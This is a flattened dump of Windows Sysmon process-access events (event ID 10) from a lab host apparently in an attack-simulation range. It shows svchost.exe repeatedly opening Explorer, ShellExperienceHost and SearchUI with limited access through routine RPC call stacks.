07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 